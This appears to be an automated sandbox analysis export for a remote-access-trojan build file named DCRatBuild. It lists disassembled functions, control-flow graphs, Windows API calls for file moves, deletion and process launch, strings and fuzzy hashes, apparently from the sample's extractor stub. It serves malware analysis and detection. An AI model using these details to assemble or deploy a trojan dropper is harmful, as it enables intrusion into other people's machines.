                      control_flow_graph 257 d700cf-d700ee call d7e360 GetModuleHandleW 260 d70154-d703b2 257->260 261 d700f0-d70107 GetProcAddress 257->261 262 d70484-d704b3 GetModuleFileNameW call d6bc85 call d6fe56 260->262 263 d703b8-d703c3 call d870dd 260->263 264 d70121-d70131 GetProcAddress 261->264 265 d70109-d7011f 261->265 279 d704b5-d704bf call d6acf5 262->279 263->262 274 d703c9-d703fa GetModuleFileNameW CreateFileW 263->274 264->260 266 d70133-d70152 264->266 265->264 266->260 276 d703fc-d7040a SetFilePointer 274->276 277 d70478-d7047f CloseHandle 274->277 276->277 280 d7040c-d70429 ReadFile 276->280 277->262 286 d704c1-d704c5 call d70085 279->286 287 d704cc 279->287 280->277 282 d7042b-d70450 280->282 284 d7046d-d70476 call d6fbd8 282->284 284->277 293 d70452-d7046c call d70085 284->293 294 d704ca 286->294 288 d704ce-d704d0 287->288 291 d704f2-d70518 call d6bcfb GetFileAttributesW 288->291 292 d704d2-d704f0 CompareStringW 288->292 295 d7051a-d7051e 291->295 301 d70522 291->301 292->291 292->295 293->284 294->288 295->279 300 d70520 295->300 302 d70526-d70528 300->302 301->302 303 d70560-d70562 302->303 304 d7052a 302->304 305 d7066f-d70679 303->305 306 d70568-d7057f call d6bccf call d6acf5 303->306 307 d7052c-d70552 call d6bcfb GetFileAttributesW 304->307 317 d705e7-d7061a call d6400a AllocConsole 306->317 318 d70581-d705e2 call d70085 * 2 call d6ddd1 call d6400a call d6ddd1 call d79f35 306->318 313 d70554-d70558 307->313 314 d7055c 307->314 313->307 316 d7055a 313->316 314->303 316->303 323 d70667-d70669 ExitProcess 317->323 324 d7061c-d70661 GetCurrentProcessId AttachConsole call d835b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00D700E4
                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D700F6
                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D70127
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D703D4
                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D703F0
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D70402
                      • ReadFile.KERNEL32(00000000,?,00007FFE,00D93BA4,00000000), ref: 00D70421
                      • CloseHandle.KERNEL32(00000000), ref: 00D70479
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D7048F
                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D704E7
                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00D70510
                      • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00D7054A
                        • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                        • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                      • _swprintf.LIBCMT ref: 00D705BE
                      • _swprintf.LIBCMT ref: 00D7060A
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • AllocConsole.KERNEL32 ref: 00D70612
                      • GetCurrentProcessId.KERNEL32 ref: 00D7061C
                      • AttachConsole.KERNEL32(00000000), ref: 00D70623
                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D70649
                      • WriteConsoleW.KERNEL32(00000000), ref: 00D70650
                      • Sleep.KERNEL32(00002710), ref: 00D7065B
                      • FreeConsole.KERNEL32 ref: 00D70661
                      • ExitProcess.KERNEL32 ref: 00D70669
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                      • API String ID: 1201351596-3298887752
                      • Opcode ID: dc8939a99cbd915353c8acb3c6529678af04c28ac4c0dcc07bf4c0fbf8d533d5
                      • Instruction ID: 3268a430e0e20869bc9bacf7909711312be4474e19cd2eb238f2f94b612a43e5
                      • Opcode Fuzzy Hash: dc8939a99cbd915353c8acb3c6529678af04c28ac4c0dcc07bf4c0fbf8d533d5
                      • Instruction Fuzzy Hash: 36D13FB1508384EBDB309F50D849B9FBBE8EF85704F54491DF68D96390DBB08A498B72
                      Function 00D7BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 406 d7bdf5-d7be0d call d7e28c call d7e360 411 d7be13-d7be3d call d7aa36 406->411 412 d7ca90-d7ca9d 406->412 411->412 415 d7be43-d7be48 411->415 416 d7be49-d7be57 415->416 417 d7be58-d7be6d call d7a6c7 416->417 420 d7be6f 417->420 421 d7be71-d7be86 call d717ac 420->421 424 d7be93-d7be96 421->424 425 d7be88-d7be8c 421->425 427 d7ca5c-d7ca87 call d7aa36 424->427 428 d7be9c 424->428 425->421 426 d7be8e 425->426 426->427 427->416 439 d7ca8d-d7ca8f 427->439 430 d7c115-d7c117 428->430 431 d7c074-d7c076 428->431 432 d7bea3-d7bea6 428->432 433 d7c132-d7c134 428->433 430->427 435 d7c11d-d7c12d SetWindowTextW 430->435 431->427 437 d7c07c-d7c088 431->437 432->427 438 d7beac-d7bf06 call d79da4 call d6b965 call d6a49d call d6a5d7 call d670bf 432->438 433->427 436 d7c13a-d7c141 433->436 435->427 436->427 440 d7c147-d7c160 436->440 441 d7c09c-d7c0a1 437->441 442 d7c08a-d7c09b call d87168 437->442 494 d7c045-d7c05a call d6a52a 438->494 439->412 444 d7c162 440->444 445 d7c168-d7c176 call d835b3 440->445 448 d7c0a3-d7c0a9 441->448 449 d7c0ab-d7c0b6 call d7ab9a 441->449 442->441 444->445 445->427 462 d7c17c-d7c185 445->462 453 d7c0bb-d7c0bd 448->453 449->453 455 d7c0bf-d7c0c6 call d835b3 453->455 456 d7c0c8-d7c0e8 call d835b3 call d835de 453->456 455->456 481 d7c101-d7c103 456->481 482 d7c0ea-d7c0f1 456->482 466 d7c187-d7c18b 462->466 467 d7c1ae-d7c1b1 462->467 466->467 472 d7c18d-d7c195 466->472 469 d7c1b7-d7c1ba 467->469 470 d7c296-d7c2a4 call d6fe56 467->470 475 d7c1c7-d7c1e2 469->475 476 d7c1bc-d7c1c1 469->476 491 d7c2a6-d7c2ba call d817cb 470->491 472->427 479 d7c19b-d7c1a9 call d6fe56 472->479 495 d7c1e4-d7c21e 475->495 496 d7c22c-d7c233 475->496 476->470 476->475 479->491 481->427 490 d7c109-d7c110 call d835ce 481->490 488 d7c0f3-d7c0f5 482->488 489 d7c0f8-d7c100 call d87168 482->489 488->489 489->481 490->427 505 d7c2c7-d7c318 call d6fe56 call d7a8d0 GetDlgItem SetWindowTextW SendMessageW call d835e9 491->505 506 d7c2bc-d7c2c0 491->506 512 d7c060-d7c06f call d6a4b3 494->512 513 d7bf0b-d7bf1f SetFileAttributesW 494->513 529 d7c222-d7c224 495->529 530 d7c220 495->530 502 d7c235-d7c24d call d835b3 496->502 503 d7c261-d7c284 call d835b3 * 2 496->503 502->503 516 d7c24f-d7c25c call d6fe2e 502->516 503->491 534 d7c286-d7c294 call d6fe2e 503->534 540 d7c31d-d7c321 505->540 506->505 511 d7c2c2-d7c2c4 506->511 511->505 512->427 518 d7bfc5-d7bfd5 GetFileAttributesW 513->518 519 d7bf25-d7bf58 call d6b4f7 call d6b207 call d835b3 513->519 516->503 518->494 527 d7bfd7-d7bfe6 DeleteFileW 518->527 549 d7bf6b-d7bf79 call d6b925 519->549 550 d7bf5a-d7bf69 call d835b3 519->550 527->494 533 d7bfe8-d7bfeb 527->533 529->496 530->529 537 d7bfef-d7c01b call d6400a GetFileAttributesW 533->537 534->491 547 d7bfed-d7bfee 537->547 548 d7c01d-d7c033 MoveFileW 537->548 540->427 544 d7c327-d7c33b SendMessageW 540->544 544->427 547->537 548->494 551 d7c035-d7c03f MoveFileExW 548->551 549->512 556 d7bf7f-d7bfbe call d835b3 call d7f350 549->556 550->549 550->556 551->494 556->518
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D7BDFA
                        • Part of subcall function 00D7AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D7AAFE
                      • SetWindowTextW.USER32(?,?), ref: 00D7C127
                      • _wcsrchr.LIBVCRUNTIME ref: 00D7C2B1
                      • GetDlgItem.USER32(?,00000066), ref: 00D7C2EC
                      • SetWindowTextW.USER32(00000000,?), ref: 00D7C2FC
                      • SendMessageW.USER32(00000000,00000143,00000000,00DAA472), ref: 00D7C30A
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D7C335
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                      • API String ID: 3564274579-312220925
                      • Opcode ID: 40857879e18f360ede30e6d781a7af194669d6d13ec3c117d3df526f59addd4a
                      • Instruction ID: d52dd1e32aee301892ae5d0de0771bcca8428c226819231c9676bed654bc8699
                      • Opcode Fuzzy Hash: 40857879e18f360ede30e6d781a7af194669d6d13ec3c117d3df526f59addd4a
                      • Instruction Fuzzy Hash: C5E14E72D00619AEDB25EBA4DC45EEE777CEF08711F1481AAF909E2151FB709A848B70
                      Function 00D6D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 561 d6d341-d6d378 call d7e28c call d7e360 call d815e8 568 d6d37a-d6d3a9 GetModuleFileNameW call d6bc85 call d6fe2e 561->568 569 d6d3ab-d6d3b4 call d6fe56 561->569 572 d6d3b9-d6d3dd call d69619 call d699b0 568->572 569->572 580 d6d3e3-d6d3eb 572->580 581 d6d7a0-d6d7a6 call d69653 572->581 583 d6d3ed-d6d405 call d73781 * 2 580->583 584 d6d409-d6d438 call d85a90 * 2 580->584 585 d6d7ab-d6d7bb 581->585 595 d6d407 583->595 594 d6d43b-d6d43e 584->594 596 d6d444-d6d44a call d69e40 594->596 597 d6d56c-d6d58f call d69d30 call d835d3 594->597 595->584 601 d6d44f-d6d476 call d69bf0 596->601 597->581 606 d6d595-d6d5b0 call d69bf0 597->606 607 d6d535-d6d538 601->607 608 d6d47c-d6d484 601->608 622 d6d5b2-d6d5b7 606->622 623 d6d5b9-d6d5cc call d835d3 606->623 612 d6d53b-d6d55d call d69d30 607->612 610 d6d486-d6d48e 608->610 611 d6d4af-d6d4ba 608->611 610->611 614 d6d490-d6d4aa call d85ec0 610->614 615 d6d4e5-d6d4ed 611->615 616 d6d4bc-d6d4c8 611->616 612->594 626 d6d563-d6d566 612->626 637 d6d4ac 614->637 638 d6d52b-d6d533 614->638 620 d6d4ef-d6d4f7 615->620 621 d6d519-d6d51d 615->621 616->615 618 d6d4ca-d6d4cf 616->618 618->615 625 d6d4d1-d6d4e3 call d85808 618->625 620->621 627 d6d4f9-d6d513 call d85ec0 620->627 621->607 628 d6d51f-d6d522 621->628 629 d6d5f1-d6d5f8 622->629 623->581 642 d6d5d2-d6d5ee call d7137a call d835ce 623->642 625->615 643 d6d527 625->643 626->581 626->597 627->581 627->621 628->608 633 d6d5fc-d6d625 call d6fdfb call d835d3 629->633 634 d6d5fa 629->634 651 d6d627-d6d62e call d835ce 633->651 652 d6d633-d6d649 633->652 634->633 637->611 638->612 642->629 643->638 651->581 654 d6d731-d6d757 call d6ce72 call d835ce * 2 652->654 655 d6d64f-d6d65d 652->655 692 d6d771-d6d79d call d85a90 * 2 654->692 693 d6d759-d6d76f call d73781 * 2 654->693 658 d6d664-d6d669 655->658 659 d6d66f-d6d678 658->659 660 d6d97c-d6d984 658->660 662 d6d684-d6d68b 659->662 663 d6d67a-d6d67e 659->663 664 d6d98a-d6d98e 660->664 665 d6d72b-d6d72e 660->665 667 d6d880-d6d891 call d6fcbf 662->667 668 d6d691-d6d6b6 662->668 663->660 663->662 669 d6d990-d6d996 664->669 670 d6d9de-d6d9e4 664->670 665->654 694 d6d976-d6d979 667->694 695 d6d897-d6d8c0 call d6fe56 call d85885 667->695 674 d6d6b9-d6d6de call d835b3 call d85808 668->674 675 d6d722-d6d725 669->675 676 d6d99c-d6d9a3 669->676 672 d6d9e6-d6d9ec 670->672 673 d6da0a-d6da2a call d6ce72 670->673 672->673 679 d6d9ee-d6d9f4 672->679 697 d6da02-d6da05 673->697 711 d6d6f6 674->711 712 d6d6e0-d6d6ea 674->712 675->658 675->665 682 d6d9a5-d6d9a8 676->682 683 d6d9ca 676->683 679->675 687 d6d9fa-d6da01 679->687 690 d6d9c6-d6d9c8 682->690 691 d6d9aa-d6d9ad 682->691 686 d6d9cc-d6d9d9 683->686 686->675 687->697 690->686 699 d6d9c2-d6d9c4 691->699 700 d6d9af-d6d9b2 691->700 692->581 693->692 694->660 695->694 720 d6d8c6-d6d93c call d71596 call d6fdfb call d6fdd4 call d6fdfb call d858d9 695->720 699->686 705 d6d9b4-d6d9b8 700->705 706 d6d9be-d6d9c0 700->706 705->679 713 d6d9ba-d6d9bc 705->713 706->686 718 d6d6f9-d6d6fd 711->718 712->711 717 d6d6ec-d6d6f4 712->717 713->686 717->718 718->674 721 d6d6ff-d6d706 718->721 754 d6d93e-d6d947 720->754 755 d6d94a-d6d95f 720->755 723 d6d7be-d6d7c1 721->723 724 d6d70c-d6d71a call d6fdfb 721->724 723->667 726 d6d7c7-d6d7ce 723->726 728 d6d71f 724->728 730 d6d7d6-d6d7d7 726->730 731 d6d7d0-d6d7d4 726->731 728->675 730->726 731->730 733 d6d7d9-d6d7e7 731->733 735 d6d808-d6d830 call d71596 733->735 736 d6d7e9-d6d7ec 733->736 743 d6d832-d6d84e call d835e9 735->743 744 d6d853-d6d85b 735->744 739 d6d805 736->739 740 d6d7ee-d6d803 736->740 739->735 740->736 740->739 743->728 747 d6d862-d6d87b call d6dd6b 744->747 748 d6d85d 744->748 747->728 748->747 754->755 756 d6d960-d6d967 755->756 757 d6d973-d6d974 756->757 758 d6d969-d6d96d 756->758 757->756 758->728 758->757
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D6D346
                      • _wcschr.LIBVCRUNTIME ref: 00D6D367
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00D6D328,?), ref: 00D6D382
                      • __fprintf_l.LIBCMT ref: 00D6D873
                        • Part of subcall function 00D7137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D6B652,00000000,?,?,?,000103F6), ref: 00D71396
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                      • API String ID: 4184910265-980926923
                      • Opcode ID: c88022baf3ff28cdbcd6dfa4bae1649a7a08ebc459e022467c8f86a612aa9e79
                      • Instruction ID: c8987b523e37a1ebfdb5b91b8e2a57bd35fff0eb79e5042dd048b9cba4aff1e6
                      • Opcode Fuzzy Hash: c88022baf3ff28cdbcd6dfa4bae1649a7a08ebc459e022467c8f86a612aa9e79
                      • Instruction Fuzzy Hash: 7112A271E002199FDF24EFA4EC81BEEB7B6EF04704F14456AE546A7291EB709A44CB70
                      Function 00D7CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00D7AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                        • Part of subcall function 00D7AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                        • Part of subcall function 00D7AC74: IsDialogMessageW.USER32(000103F6,?), ref: 00D7ACAA
                        • Part of subcall function 00D7AC74: TranslateMessage.USER32(?), ref: 00D7ACB8
                        • Part of subcall function 00D7AC74: DispatchMessageW.USER32(?), ref: 00D7ACC2
                      • GetDlgItem.USER32(00000068,00DBECB0), ref: 00D7CB6E
                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00D7A632,00000001,?,?,00D7AECB,00D94F88,00DBECB0), ref: 00D7CB96
                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D7CBA1
                      • SendMessageW.USER32(00000000,000000C2,00000000,00D935B4), ref: 00D7CBAF
                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D7CBC5
                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D7CBDF
                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D7CC23
                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D7CC31
                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D7CC40
                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D7CC67
                      • SendMessageW.USER32(00000000,000000C2,00000000,00D9431C), ref: 00D7CC76
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                      • String ID: \
                      • API String ID: 3569833718-2967466578
                      • Opcode ID: 23dbde3b440688cc713525f56f0fcf9a32981865d3ac0438f3c077c76f4034ff
                      • Instruction ID: 1fef7ec4b9dfd8f607a8d9572e6a2a52af32468bf3dd1ec46a3f92a2a4d13273
                      • Opcode Fuzzy Hash: 23dbde3b440688cc713525f56f0fcf9a32981865d3ac0438f3c077c76f4034ff
                      • Instruction Fuzzy Hash: FB31D171185343AFE301DF20DC8AFAB7FACEB86744F000519FA51D6291EB644908EBB6
                      Function 00D7CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 795 d7ce22-d7ce3a call d7e360 798 d7ce40-d7ce4c call d835b3 795->798 799 d7d08b-d7d093 795->799 798->799 802 d7ce52-d7ce7a call d7f350 798->802 805 d7ce84-d7ce91 802->805 806 d7ce7c 802->806 807 d7ce95-d7ce9e 805->807 808 d7ce93 805->808 806->805 809 d7ced6 807->809 810 d7cea0-d7cea2 807->810 808->807 811 d7ceda-d7cedd 809->811 812 d7ceaa-d7cead 810->812 813 d7cee4-d7cee6 811->813 814 d7cedf-d7cee2 811->814 815 d7ceb3-d7cebb 812->815 816 d7d03c-d7d041 812->816 821 d7cef9-d7cf0e call d6b493 813->821 822 d7cee8-d7ceef 813->822 814->813 814->821 817 d7d055-d7d05d 815->817 818 d7cec1-d7cec7 815->818 819 d7d036-d7d03a 816->819 820 d7d043 816->820 825 d7d065-d7d06d 817->825 826 d7d05f-d7d061 817->826 818->817 823 d7cecd-d7ced4 818->823 819->816 824 d7d048-d7d04c 819->824 820->824 830 d7cf27-d7cf32 call d6a180 821->830 831 d7cf10-d7cf1d call d717ac 821->831 822->821 827 d7cef1 822->827 823->809 823->812 824->817 825->811 826->825 827->821 836 d7cf34-d7cf4b call d6b239 830->836 837 d7cf4f-d7cf5c ShellExecuteExW 830->837 831->830 838 d7cf1f 831->838 836->837 840 d7cf62-d7cf6f 837->840 841 d7d08a 837->841 838->830 843 d7cf82-d7cf84 840->843 844 d7cf71-d7cf78 840->844 841->799 846 d7cf86-d7cf8f 843->846 847 d7cf9b-d7cfba call d7d2e6 843->847 844->843 845 d7cf7a-d7cf80 844->845 845->843 848 d7cff1-d7cffd CloseHandle 845->848 846->847 857 d7cf91-d7cf99 ShowWindow 846->857 847->848 862 d7cfbc-d7cfc4 847->862 850 d7cfff-d7d00c call d717ac 848->850 851 d7d00e-d7d01c 848->851 850->851 863 d7d072 850->863 855 d7d01e-d7d020 851->855 856 d7d079-d7d07b 851->856 855->856 861 d7d022-d7d028 855->861 856->841 860 d7d07d-d7d07f 856->860 857->847 860->841 864 d7d081-d7d084 ShowWindow 860->864 861->856 865 d7d02a-d7d034 861->865 862->848 866 d7cfc6-d7cfd7 GetExitCodeProcess 862->866 863->856 864->841 865->856 866->848 867 d7cfd9-d7cfe3 866->867 868 d7cfe5 867->868 869 d7cfea 867->869 868->869 869->848
                      APIs
                      • ShellExecuteExW.SHELL32(?), ref: 00D7CF54
                      • ShowWindow.USER32(?,00000000), ref: 00D7CF93
                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00D7CFCF
                      • CloseHandle.KERNEL32(?), ref: 00D7CFF5
                      • ShowWindow.USER32(?,00000001), ref: 00D7D084
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                      • String ID: $.exe$.inf
                      • API String ID: 3686203788-2452507128
                      • Opcode ID: 4c6c61f791929807e1170daa68b5196682400ec959ac2709040a19bf0e8ef35a
                      • Instruction ID: d72e5775f36f80f8e8232802998d86b231efa947896cb1e0aef1ebd638ced57e
                      • Opcode Fuzzy Hash: 4c6c61f791929807e1170daa68b5196682400ec959ac2709040a19bf0e8ef35a
                      • Instruction Fuzzy Hash: 9D61CF70414381DEDB319F249800AABBBF6EF85304F08A91EF5C997255F7B18989CB72
                      Function 00D8A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 870 d8a058-d8a071 871 d8a073-d8a083 call d8e6ed 870->871 872 d8a087-d8a08c 870->872 871->872 882 d8a085 871->882 874 d8a099-d8a0bd MultiByteToWideChar 872->874 875 d8a08e-d8a096 872->875 877 d8a250-d8a263 call d7ec4a 874->877 878 d8a0c3-d8a0cf 874->878 875->874 879 d8a0d1-d8a0e2 878->879 880 d8a123 878->880 883 d8a101-d8a112 call d88518 879->883 884 d8a0e4-d8a0f3 call d91a30 879->884 886 d8a125-d8a127 880->886 882->872 890 d8a245 883->890 896 d8a118 883->896 884->890 895 d8a0f9-d8a0ff 884->895 889 d8a12d-d8a140 MultiByteToWideChar 886->889 886->890 889->890 893 d8a146-d8a158 call d8a72c 889->893 894 d8a247-d8a24e call d8a2c0 890->894 901 d8a15d-d8a161 893->901 894->877 900 d8a11e-d8a121 895->900 896->900 900->886 901->890 902 d8a167-d8a16e 901->902 903 d8a1a8-d8a1b4 902->903 904 d8a170-d8a175 902->904 906 d8a200 903->906 907 d8a1b6-d8a1c7 903->907 904->894 905 d8a17b-d8a17d 904->905 905->890 908 d8a183-d8a19d call d8a72c 905->908 909 d8a202-d8a204 906->909 910 d8a1c9-d8a1d8 call d91a30 907->910 911 d8a1e2-d8a1f3 call d88518 907->911 908->894 923 d8a1a3 908->923 913 d8a23e-d8a244 call d8a2c0 909->913 914 d8a206-d8a21f call d8a72c 909->914 910->913 926 d8a1da-d8a1e0 910->926 911->913 922 d8a1f5 911->922 913->890 914->913 928 d8a221-d8a228 914->928 927 d8a1fb-d8a1fe 922->927 923->890 926->927 927->909 929 d8a22a-d8a22b 928->929 930 d8a264-d8a26a 928->930 931 d8a22c-d8a23c WideCharToMultiByte 929->931 930->931 931->913 932 d8a26c-d8a273 call d8a2c0 931->932 932->894
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D84E35,00D84E35,?,?,?,00D8A2A9,00000001,00000001,3FE85006), ref: 00D8A0B2
                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D8A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00D8A138
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D8A232
                      • __freea.LIBCMT ref: 00D8A23F
                        • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      • __freea.LIBCMT ref: 00D8A248
                      • __freea.LIBCMT ref: 00D8A26D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
